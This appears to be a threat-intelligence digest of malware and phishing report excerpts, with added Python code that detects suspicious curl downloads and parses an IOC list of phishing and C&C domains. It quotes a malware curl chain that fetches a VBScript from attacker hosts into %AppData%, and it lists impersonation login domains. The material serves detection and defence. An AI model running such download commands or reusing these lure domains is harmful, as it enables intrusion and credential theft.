In our daily botnet analysis work, it is common to encounter various loaders. Compared to other types of malware, loaders are unique in that they are mainly used to “promote”, i.e., download and run, other malware on the infected machine. According to our observations, most loaders are proprietary and have a binding relationship with the family they promote.…


The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is aimed at people working in that field.…


The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware has yet to be determined, but the VBScript itself is downloaded with curl.

The commands discovered so far are as follows:

curl  -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%vbtemp cmd /c cd > %appdata%tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs…
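The quoted chain has a recognisable shape: curl launched with a hand-set browser User-Agent header, fetching an extension-less path from a free web host, and writing the result under %AppData% before cmd.exe runs further commands. As an added example (not code from the ASEC post), the Python below runs that shape as a detection over process-creation command lines. The sample command lines are constructed for the example and keep only the defanged hostnames from the quoted command; the scoring thresholds are an assumption, not a rule from the post.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation command lines (not from the original post).
# The first two reproduce the shape of the curl chain quoted above, keeping
# its defanged hostnames; the last two are benign controls.
SAMPLE_COMMAND_LINES = [
    'curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" '
    'hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%vbtemp',
    'cmd /c cd > %appdata%tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%tmp.vbs',
    'curl -sS https://example.org/updates/manifest.json -o C:\\ProgramData\\app\\manifest.json',
    'curl -H "user-agent: Mozilla/5.0" https://example.org/ -o C:\\Users\\Public\\page.html',
]

TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')        # quoted strings stay one token
SEPARATOR_RE = re.compile(r'\s*(?:&&|\|\||\||;)\s*')     # cmd.exe command separators
APPDATA_RE = re.compile(r'%appdata%|\\appdata\\roaming\\', re.IGNORECASE)
URL_RE = re.compile(r'^(?:hxxps?|https?)://', re.IGNORECASE)


def refang(url):
    """Turn hxxp://host[.]tld into http://host.tld so urlparse can read it."""
    return re.sub(r'^hxxp', 'http', url.replace('[.]', '.'), flags=re.IGNORECASE)


def tokenize(segment):
    return [t.strip('"\'') for t in TOKEN_RE.findall(segment)]


def analyse_curl(segment):
    """Return a finding dict for a curl invocation, or None for anything else."""
    toks = tokenize(segment)
    if not toks:
        return None
    exe = re.split(r'[\\/]', toks[0])[-1].lower()
    if exe not in ('curl', 'curl.exe'):
        return None
    finding = {'segment': segment, 'host': None, 'output': None, 'custom_ua': False}
    i = 1
    while i < len(toks):
        tok = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else None
        if tok in ('-o', '--output') and nxt is not None:
            finding['output'] = nxt
            i += 2
        elif tok in ('-H', '--header') and nxt is not None:
            if nxt.lower().startswith('user-agent:'):
                finding['custom_ua'] = True
            i += 2
        elif tok in ('-A', '--user-agent') and nxt is not None:
            finding['custom_ua'] = True
            i += 2
        else:
            if URL_RE.match(tok):
                finding['host'] = urlparse(refang(tok)).hostname
            i += 1
    # Scoring (an assumption for this example, not a rule from the post): dropping
    # the download into %AppData% is the strong signal, a hand-set browser
    # User-Agent a weak one on its own.
    finding['writes_appdata'] = bool(finding['output'] and APPDATA_RE.search(finding['output']))
    finding['score'] = 2 * int(finding['writes_appdata']) + int(finding['custom_ua'])
    finding['flagged'] = finding['score'] >= 2
    return finding


def scan(command_lines):
    """Split each command line on cmd.exe separators and analyse every curl call."""
    findings = []
    for line in command_lines:
        for segment in SEPARATOR_RE.split(line):
            finding = analyse_curl(segment)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_COMMAND_LINES):
        verdict = 'FLAG' if f['flagged'] else 'ok  '
        print(f"{verdict} score={f['score']} host={f['host']} output={f['output']}")
```

The split on `&&`/`|`/`;` matters: in the quoted chain the interesting curl call is the second command on the line, so a rule that only inspects the first token of a command line would never see it. Feed the function the full command line from a Sysmon Event ID 4688/Sysmon Event 1 record rather than the image path alone.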

Mitiga spotted a sophisticated business email compromise (BEC) campaign directly targeting relevant executives of organizations (mostly CEOs and CFOs) using Office 365. The attackers combine high-end spear-phishing with an adversary-in-the-middle (AiTM) attack to circumvent multi-factor authentication (MFA), and exploit a Microsoft 365 design flaw that lets them persist their access even with MFA enabled.…


BlueSky ransomware is an emerging threat that researchers have been paying increasing attention to since its initial discovery in late June 2022. The ransomware has been observed being spread via trojanized downloads from questionable websites as well as in phishing emails.

Although infections at this time remain low, the ransomware’s characteristics, described below, suggest it has been carefully developed for a sustained campaign.…

Research by: Moshe Marelus

Highlights:
Check Point Research (CPR) detected a Turkish-based crypto-miner malware campaign, dubbed ‘Nitrokod’, which infected machines across 11 countries.
The malware is dropped from popular software available on dozens of free software websites.
The malware distributors separate the malicious activity from the downloaded fake software to avoid detection.
The attack was initially found by Check Point XDR, which overcomes the attack’s evasion mechanism.…

Remcos is a remote access trojan, malware used to take remote control over infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security.

Although Breaking Security promises that the program is only available to those who intend to use it for legal purposes, in reality Remcos RAT gives clients all the features needed to launch potentially destructive attacks.…


IP;C&C domains

45[.]76[.]80[.]199;twiiio-sso[.]com, box-okta[.]org, kucoin-pin[.]com, boxokta[.]com, kucoin-sso[.]com
66[.]42[.]107[.]233;slack-mailchimp[.]com
45[.]32[.]66[.]165;microsoft-sso[.]net, sendgrid-okta[.]org, mlcrosoft[.]info, mlcrosoft[.]cloud
45[.]76[.]238[.]53;ouryahoo-okta[.]org, ouryahooinc-okta[.]com
155[.]138[.]240[.]251;sykes-sso[.]com, internai-customer[.]io, ouryahoo-okta[.]com, ouryahoo-okta[.]net, techmahindra-sso[.]com
149[.]28[.]37[.]137;qualfon-sso[.]com, twiiio[.]net, twiiio[.]org, teleperformanceusa-sso[.]com, tmo-sso[.]net, okta-sso[.]net
149[.]248[.]1[.]50;att-mfa[.]com, att-rsa[.]com
108[.]61[.]119[.]20;mcsupport-okta[.]com, mailgun-okta[.]com, sprint-idg[.]net
149[.]28[.]212[.]53;tmobie[.]net
140[.]82[.]63[.]209;kucoinpin[.]com, kucoinpin[.]net, twiiio-okta[.]net
144[.]202[.]82[.]47;kucoin-pin[.]net, kucoin-sso[.]net
45[.]63[.]39[.]116;telus-sso[.]com
149[.]248[.]62[.]54;rogers-rci[.]net, rogers-ssp[.]com, iqor-duo[.]net, iqor-portal[.]com, cgslnc-okta[.]com, conexusonline[.]com, klaviyo-sso[.]com
66[.]42[.]91[.]138;arise-okta[.]com
216[.]128[.]141[.]52;rogers-rci[.]com,…
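The list above is a flattened "IP;domain, domain" table with every indicator defanged as `[.]`, and almost every host is a brand name glued to an authentication word (okta, sso, mfa, duo, rsa, pin). As an added example, not code from the original report, the Python below parses that layout back into a structure, refangs the indicators, splits each host into the impersonated brand and the lure keyword, and matches constructed DNS query log lines against the result. Only the first entries of the list are embedded (copied from the text above); the DNS log lines and the lure keyword set are constructed for the example.

```python
import re

# The IOC list as it appears above, defanged with "[.]"; the first entries are
# reproduced verbatim so the parser runs offline. The trailing "…" on the last
# entry is the page's own truncation and is handled as such.
RAW_IOC_TEXT = (
    "IP;C&C domains "
    "45[.]76[.]80[.]199;twiiio-sso[.]com, box-okta[.]org, kucoin-pin[.]com, boxokta[.]com, kucoin-sso[.]com "
    "66[.]42[.]107[.]233;slack-mailchimp[.]com "
    "45[.]32[.]66[.]165;microsoft-sso[.]net, sendgrid-okta[.]org, mlcrosoft[.]info, mlcrosoft[.]cloud "
    "149[.]248[.]1[.]50;att-mfa[.]com, att-rsa[.]com "
    "216[.]128[.]141[.]52;rogers-rci[.]com,…"
)

# A defanged IPv4 followed by the ';' column separator; capturing it lets
# re.split hand back [prefix, ip, domains, ip, domains, ...].
IP_SPLIT_RE = re.compile(r'(\d{1,3}(?:\[\.\]\d{1,3}){3});')

# Lure words taken from the list above; the remaining part of the label is the
# impersonated brand (e.g. twiiio-sso -> "twiiio", a Twilio look-alike).
AUTH_LURES = ('okta', 'sso', 'mfa', 'duo', 'rsa', 'pin')


def refang(indicator):
    return indicator.replace('[.]', '.')


def parse_ioc_text(text):
    """Return {ip: [domain, ...]} from the flattened 'IP;dom, dom IP;dom' text."""
    parts = IP_SPLIT_RE.split(text)
    iocs = {}
    for ip, domain_blob in zip(parts[1::2], parts[2::2]):
        domains = [refang(d.strip(' …')) for d in domain_blob.split(',')]
        iocs[refang(ip)] = [d for d in domains if d]
    return iocs


def lure_parts(domain):
    """Split a phishing host into (brand, lure); lure is None without an auth keyword."""
    label = domain.split('.')[0]
    for kw in AUTH_LURES:                      # brand-lure and brandlure forms
        if label.endswith('-' + kw):
            return label[:-len(kw) - 1], kw
        if label.endswith(kw) and len(label) > len(kw):
            return label[:-len(kw)], kw
    for kw in AUTH_LURES:                      # lure-brand form
        if label.startswith(kw + '-'):
            return label[len(kw) + 1:], kw
    return label, None


def match_dns_queries(query_log, iocs):
    """Return (client, qname, c2_ip) for log lines whose queried name is listed."""
    watch = {d: ip for ip, doms in iocs.items() for d in doms}
    hits = []
    for line in query_log:
        _ts, client, qname = line.split()[:3]
        key = qname.lower().rstrip('.')          # tolerate trailing-dot FQDNs
        if key in watch:
            hits.append((client, qname, watch[key]))
    return hits


# Constructed DNS query log lines in the form "<timestamp> <client> <qname>".
SAMPLE_DNS_LOG = [
    "2022-08-25T09:14:02Z 10.0.4.17 okta.example.com",
    "2022-08-25T09:14:31Z 10.0.4.17 twiiio-sso.com",
    "2022-08-25T09:15:07Z 10.0.9.3 mlcrosoft.info.",
]


if __name__ == '__main__':
    iocs = parse_ioc_text(RAW_IOC_TEXT)
    for ip, domains in iocs.items():
        for d in domains:
            brand, lure = lure_parts(d)
            print(f"{ip:16} {d:28} brand={brand} lure={lure}")
    for client, qname, c2 in match_dns_queries(SAMPLE_DNS_LOG, iocs):
        print(f"HIT {client} queried {qname} -> hosted on {c2}")
```

The brand/lure split is what turns a flat blocklist into something a SOC can act on: grouping by lure shows which login flow (Okta, generic SSO, MFA prompt) the kit imitates, and grouping by brand shows which of your vendors or partners are being impersonated, which is the list you want to hand to the people who own those relationships.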


Key points

The Black Hat network is more complex than a standard enterprise network because of the number and diversity of connected devices, the abundance of trainings and labs running on it, and the short, fast-moving nature of the engagement itself. Over the course of the conference, our IronDefense NDR solution generated 31 malicious alerts and 45 suspicious alerts, detecting both real malware activity and simulated attack tactics from classes and demos.…

BleachGap ransomware was first reported in February 2021 by a researcher named Petrovic on Twitter. The variant we analysed was reported on Twitter in June 2022. It caught our interest because it was tagged as a stealer and all of its code is compiled into a single executable, so it does not need any supporting .bat…

New .NET-Based Ransomware Performs Targeted Attack

Organizations of every size are facing threats from threat actors (TAs) more frequently than ever before. An organization's primary risk remains losing access to its systems and data, which is further aggravated by the threat of TAs leaking the data if ransom demands are not met or the victim contacts law enforcement.…


A malicious campaign spreading the information stealer AgentTesla began circulating in mid-August. The actors behind the campaign are after information about victims' computers and the login credentials stored in their browsers.

Phishing emails carrying a malicious attachment, sent from spoofed email addresses, are being delivered to businesses across South America and Europe.…


Kimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor primarily targeting Korea-related entities. Like other sophisticated adversaries, this group updates its tools very quickly. In early 2022, we observed the group attacking media outlets and a think tank in South Korea, and reported the technical details to our threat intelligence customers.…
